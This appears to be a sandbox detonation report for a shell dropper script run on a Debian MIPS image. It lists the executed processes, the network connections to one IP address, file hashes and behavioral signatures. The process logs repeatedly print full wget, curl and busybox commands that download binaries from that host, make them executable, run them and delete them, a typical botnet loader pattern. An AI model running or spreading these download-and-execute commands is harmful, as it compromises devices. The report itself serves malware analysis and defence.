[/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/bin/chmod

[chmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI

[./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/bin/rm

[rm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/usr/bin/wget

[wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/bin/chmod

[chmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh

[./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/bin/rm

[rm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/usr/bin/wget

[wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/bin/chmod

[chmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy

[./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/bin/rm

[rm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/usr/bin/wget

[wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/bin/chmod

[chmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5

[./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/bin/rm

[rm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/usr/bin/wget

[wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/bin/chmod

[chmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk

[./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/bin/rm

[rm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/usr/bin/wget

[wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/bin/chmod

[chmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m

[./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/bin/rm

[rm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/usr/bin/wget

[wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/bin/chmod

[chmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q

[./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/bin/rm

[rm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/usr/bin/wget

[wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/bin/chmod

[chmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM

[./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/bin/rm

[rm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/usr/bin/wget

[wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/bin/chmod

[chmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv

[./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/bin/rm

[rm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/usr/bin/wget

[wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/bin/chmod

[chmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy

[./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/bin/rm

[rm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/usr/bin/wget

[wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/bin/chmod

[chmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj

[./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/bin/rm

[rm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/usr/bin/wget

[wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/bin/chmod

[chmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI

[./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/bin/rm

[rm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/usr/bin/wget

[wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/bin/chmod

[chmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh

[./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/bin/rm

[rm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/usr/bin/wget

[wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/bin/chmod

[chmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4

[./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/bin/rm

[rm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/usr/bin/wget

[wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/bin/chmod

[chmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ

[./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/bin/rm

[rm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/bin/chmod

[chmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT

[./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/bin/rm

[rm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/usr/bin/wget

[wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/bin/chmod

[chmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s

[./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/bin/rm

[rm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-24 02:06

Reported

2024-11-24 02:09

Platform

debian9-mipsel-20240611-en

Max time kernel

109s

Max time network

111s

Command Line

[/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ N/A
N/A /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT N/A
N/A /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s N/A
N/A /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 N/A
N/A /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk N/A
N/A /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m N/A
N/A /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q N/A
N/A /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM N/A
N/A /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 N/A
N/A /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv N/A
N/A /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj N/A
N/A /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI N/A
N/A /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh N/A
N/A /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy N/A
N/A /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 N/A
N/A /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk N/A
N/A /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m N/A
N/A /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q N/A
N/A /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM N/A
N/A /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv N/A
N/A /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy N/A
N/A /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj N/A
N/A /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI N/A
N/A /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh N/A
N/A /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 N/A
N/A /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ N/A
N/A /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT N/A
N/A /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /usr/bin/curl N/A
File opened for modification /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /usr/bin/curl N/A
File opened for modification /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT /usr/bin/curl N/A
File opened for modification /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /usr/bin/curl N/A
File opened for modification /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /usr/bin/curl N/A
File opened for modification /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /usr/bin/curl N/A
File opened for modification /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /usr/bin/curl N/A
File opened for modification /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 /usr/bin/curl N/A
File opened for modification /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /usr/bin/curl N/A
File opened for modification /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /usr/bin/curl N/A
File opened for modification /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /usr/bin/curl N/A
File opened for modification /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /usr/bin/curl N/A
File opened for modification /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /usr/bin/curl N/A
File opened for modification /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /usr/bin/curl N/A
File opened for modification /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /usr/bin/curl N/A
File opened for modification /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /usr/bin/curl N/A
File opened for modification /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /usr/bin/curl N/A
File opened for modification /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /usr/bin/curl N/A
File opened for modification /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 /usr/bin/curl N/A
File opened for modification /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT /usr/bin/curl N/A
File opened for modification /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s /usr/bin/curl N/A
File opened for modification /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /usr/bin/curl N/A
File opened for modification /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /usr/bin/curl N/A
File opened for modification /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /usr/bin/curl N/A
File opened for modification /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ /usr/bin/curl N/A
File opened for modification /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s /usr/bin/curl N/A
File opened for modification /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ /usr/bin/curl N/A
File opened for modification /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /usr/bin/curl N/A

Processes

/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh

[/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/bin/chmod

[chmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ

[./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/bin/rm

[rm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/bin/chmod

[chmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT

[./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/bin/rm

[rm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/usr/bin/wget

[wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/bin/chmod

[chmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

